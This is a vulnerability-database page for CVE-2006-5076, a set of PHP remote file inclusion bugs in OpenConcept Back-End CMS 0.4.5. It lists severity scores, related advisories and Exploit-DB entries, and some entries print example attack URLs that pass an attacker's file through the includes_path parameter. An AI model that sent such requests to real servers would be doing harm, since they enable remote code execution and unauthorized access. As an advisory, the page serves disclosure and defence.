CVE-2006-5076
published 2006-09-29CVE-2006-5076: Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End 0.4.5 allow remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.58%
88.0th percentile
Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End 0.4.5 allow remote attackers to execute arbitrary PHP code via a URL in the includes_path parameter in (1) admin/index.php, (2) Facts.php, or (3) search.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| back-end | back-end_cms | — | — |
| openconcept | back-end_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-g79c-ghh3-5974: Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End 0
ghsa_unreviewed·2022-05-01
CVE-2006-5076 [HIGH] GHSA-g79c-ghh3-5974: Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End 0
Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End 0.4.5 allow remote attackers to execute arbitrary PHP code via a URL in the includes_path parameter in (1) admin/index.php, (2) Facts.php, or (3) search.php.
GHSA
GHSA-gh32-2p5c-wm88: ** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End CMS 0
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-2097 [HIGH] GHSA-gh32-2p5c-wm88: ** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End CMS 0
** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End CMS 0.4.7 allow remote attackers to execute arbitrary PHP code via a URL in the includes_path parameter to (1) click.php or (2) pollcollector.php in htdocs/; or (3) index.php, (4) articlepages.php, (5) articles.php, (6) articleform.php, (7) articlesections.php, (8) createArticlesPage.php, (9) guestbook.php, (10) helpguide.php, (11) helpguideeditor.php, (12) links.php, (13) upload.php, (14) sitestatistics.php, (15) nav.php, (16) tpl_upload.php, (17) linksections, or (18) pophelp.php in htdocs/site-admin/; different vectors than CVE-2006-5076. NOTE: this issue is disputed by a third party, who states that $includes_path is defined before use.
No detection rules found.
Exploit-DB
Back-End CMS 0.4.5 - 'Facts.php?includes_path' Remote File Inclusion
exploitdb·2006-09-25
CVE-2006-5076 Back-End CMS 0.4.5 - 'Facts.php?includes_path' Remote File Inclusion
Back-End CMS 0.4.5 - 'Facts.php?includes_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20207/info
Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Back-End CMS version 0.4.5 is vulnerable to these issues.
http://www.example.com/[Path]/Facts.php?includes_path=attacker's_file
Exploit-DB
Back-End CMS 0.4.5 - 'search.php?includes_path' Remote File Inclusion
exploitdb·2006-09-25
CVE-2006-5076 Back-End CMS 0.4.5 - 'search.php?includes_path' Remote File Inclusion
Back-End CMS 0.4.5 - 'search.php?includes_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20207/info
Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Back-End CMS version 0.4.5 is vulnerable to these issues.
http://www.example.com/[Path]/search.php?includes_path=attacker's_file
Exploit-DB
Back-End CMS 0.4.5 - '/admin/index.php?includes_path' Remote File Inclusion
exploitdb·2006-09-25
CVE-2006-5076 Back-End CMS 0.4.5 - '/admin/index.php?includes_path' Remote File Inclusion
Back-End CMS 0.4.5 - '/admin/index.php?includes_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20207/info
Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Back-End CMS version 0.4.5 is vulnerable to these issues.
#!/usr/bin/perl
#################################################################
# #
# Back-end #
# #
# Class: Remote File Include Vulnerability #
# #
# Discovered By : Root3r_H3LL = |)\0073|)\_|-|311 #
# #
# Original Advisory : http://Www.PersainFox.coM #
# #
No writeups or analysis indexed.
http://securityreason.com/securityalert/1650http://www.securityfocus.com/archive/1/447005/100/0/threadedhttp://www.securityfocus.com/archive/1/448776/100/0/threadedhttp://www.securityfocus.com/archive/1/450031/100/200/threadedhttp://www.securityfocus.com/bid/20207https://exchange.xforce.ibmcloud.com/vulnerabilities/29172https://exchange.xforce.ibmcloud.com/vulnerabilities/29605http://securityreason.com/securityalert/1650http://www.securityfocus.com/archive/1/447005/100/0/threadedhttp://www.securityfocus.com/archive/1/448776/100/0/threadedhttp://www.securityfocus.com/archive/1/450031/100/200/threadedhttp://www.securityfocus.com/bid/20207https://exchange.xforce.ibmcloud.com/vulnerabilities/29172https://exchange.xforce.ibmcloud.com/vulnerabilities/29605
2006-09-29
Published